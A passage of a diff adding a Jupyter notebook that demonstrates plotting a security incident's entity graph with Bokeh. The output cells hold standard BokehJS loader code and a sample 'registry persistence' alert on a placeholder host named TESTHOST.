+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "graph = EntityGraph(incident)\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "As you can see above this has displayed a visualization that shows the incident, the alert associated with that incident and the entities associated with the incident.\n",
+    "\n",
+    "The same can be achieved by passing in an Alert or SecurityAlert entity:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1205\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1205\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1205\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1206\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1206\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1206\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"2832ca00-b2ab-4803-8cbd-15723fba51ad\" data-root-id=\"1207\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"a9828928-19df-459c-95e5-a2f6a5c8ee70\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1218\"}],\"center\":[{\"id\":\"1221\"},{\"id\":\"1225\"},{\"id\":\"1257\"},{\"id\":\"1258\"},{\"id\":\"1259\"}],\"height\":800,\"left\":[{\"id\":\"1222\"}],\"renderers\":[{\"id\":\"1242\"}],\"title\":{\"id\":\"1208\"},\"toolbar\":{\"id\":\"1233\"},\"width\":800,\"x_range\":{\"id\":\"1210\"},\"x_scale\":{\"id\":\"1214\"},\"y_range\":{\"id\":\"1212\"},\"y_scale\":{\"id\":\"1216\"}},\"id\":\"1207\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1210\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1302\",\"type\":\"Selection\"},{\"attributes\":{\"text\":\"test.exe\",\"text_font_size\":\"10pt\",\"x\":-1.5339168830320875,\"x_offset\":5,\"y\":1.3431780240007378,\"y_offset\":5},\"id\":\"1259\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1291\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"1303\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"TESTHOST\",\"text_font_size\":\"10pt\",\"x\":1.9301847321056673,\"x_offset\":5,\"y\":0.6568219759992626,\"y_offset\":5},\"id\":\"1258\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1216\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1290\",\"type\":\"NodesOnly\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1232\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"formatter\":{\"id\":\"1284\"},\"major_label_policy\":{\"id\":\"1283\"},\"ticker\":{\"id\":\"1223\"}},\"id\":\"1222\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1296\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1214\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis\":{\"id\":\"1218\"},\"ticker\":null},\"id\":\"1221\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1297\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1230\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1227\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1226\",\"type\":\"PanTool\"},{\"attributes\":{\"axis\":{\"id\":\"1222\"},\"dimension\":1,\"ticker\":null},\"id\":\"1225\",\"type\":\"Grid\"},{\"attributes\":{\"overlay\":{\"id\":\"1232\"}},\"id\":\"1228\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1231\",\"type\":\"HelpTool\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"1240\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"1252\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1223\",\"type\":\"BasicTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1226\"},{\"id\":\"1227\"},{\"id\":\"1228\"},{\"id\":\"1229\"},{\"id\":\"1230\"},{\"id\":\"1231\"},{\"id\":\"1240\"}]},\"id\":\"1233\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"1208\",\"type\":\"Title\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"1249\"},\"inspection_policy\":{\"id\":\"1290\"},\"layout_provider\":{\"id\":\"1251\"},\"node_renderer\":{\"id\":\"1245\"},\"selection_policy\":{\"id\":\"1291\"}},\"id\":\"1242\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"graph_layout\":{\"Alert: Windows registry persistence method detected\":[-0.3962678490735797,-2.0],\"TESTHOST\":[1.9301847321056673,0.6568219759992626],\"test.exe\":[-1.5339168830320875,1.3431780240007378]}},\"id\":\"1251\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{},\"id\":\"1300\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1301\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"color\":[\"orange\",\"green\",\"green\"],\"description\":[\"Windows registry persistence method detected (2018-09-27 16:59:16) TESTHOST\",\"TESTHOST.DOM.CONTOSO.COM (OSFamily.Windows)\",null],\"end_time\":[\"2018-09-27 16:59:16\",null,null],\"entitytype\":[\"alert\",\"host\",\"process\"],\"index\":[\"Alert: Windows registry persistence method detected\",\"TESTHOST\",\"test.exe\"],\"name\":[\"Windows registry persistence method detected\",\"TESTHOST\",\"test.exe\"],\"node_color\":[\"orange\",\"green\",\"green\"],\"node_type\":[\"alert\",\"entity\",\"entity\"],\"source\":[\"{ 'AdditionalData': { 'AgentId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'AzureResourceId': None,\\n                      'AzureResourceSubscriptionId': None,\\n                      'ConfidenceLevel': 'Unknown',\\n                      'ConfidenceReasons': None,\\n                      'ConfidenceScore': None,\\n                      'ExtendedLinks': None,\\n                      'ExtendedProperties': {'resourceType': 'Non-Azure Resource'},\\n                      'Intent': 'Persistence',\\n                      'IsIncident': False,\\n                      'ProviderAlertId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'SourceComputerId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'SystemSource': 'Non-Azure',\\n                      'TenantId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'TimeGeneratedUtc': '2018-09-27 16:59:47',\\n                      'WorkspaceId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'WorkspaceResourceGroup': 'test-east-us',\\n                      'WorkspaceSubscriptionId': 'b6329e79-0a94-4035-beee-c2e2657b71e3'},\\n  'AlertType': 'RegistryPersistence',\\n  'CompromisedEntity': 'TESTHOST',\\n  'DisplayName': 'Windows registry persistence method detected',\\n  'EndTimeUtc': '2018-09-27 16:59:16',\\n  'Entities': [ Host(DnsDomain=DOM.CONTOSO.COM, NTDomain=DOM, HostName=TESTHOST, NetBiosName=TESTHOST...),\\n                Process(ProcessId=0x940, CreationTimeUtc=0001-01-01 00:00:00, ImageFile=test.exe, Host={...)],\\n  'ProviderName': 'Detection',\\n  'Severity': 'Low',\\n  'StartTimeUtc': '2018-09-27 16:59:16',\\n  'SystemAlertIds': ['2518642332435550951_b6329e79-0a94-4035-beee-c2'],\\n  'Type': 'alerts',\\n  'VendorName': 'Microsoft',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DnsDomain': 'DOM.CONTOSO.COM',\\n  'HostName': 'TESTHOST',\\n  'IsDomainJoined': True,\\n  'NTDomain': 'DOM',\\n  'NetBiosName': 'TESTHOST',\\n  'OSFamily': <OSFamily.Windows: 1>,\\n  'Type': 'host',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'CommandLine': '',\\n  'CreationTimeUtc': datetime.datetime(1, 1, 1, 0, 0),\\n  'Host': { 'AdditionalData': {},\\n            'DnsDomain': 'DOM.CONTOSO.COM',\\n            'HostName': 'TESTHOST',\\n            'IsDomainJoined': True,\\n            'NTDomain': 'DOM',\\n            'NetBiosName': 'TESTHOST',\\n            'OSFamily': <OSFamily.Windows: 1>,\\n            'Type': 'host',\\n            'edges': {Edge(name=Host}},\\n  'ImageFile': 'test.exe',\\n  'ProcessId': '0x940',\\n  'Type': 'process',\\n  'edges': {Edge(name=Host}}\"],\"start_time\":[\"2018-09-27 16:59:16\",null,null],\"time_generated\":[null,null,null]},\"selected\":{\"id\":\"1300\"},\"selection_policy\":{\"id\":\"1301\"}},\"id\":\"1244\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1219\",\"type\":\"BasicTicker\"},{\"attributes\":{\"source\":{\"id\":\"1244\"}},\"id\":\"1246\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Alert: Windows registry persistence method 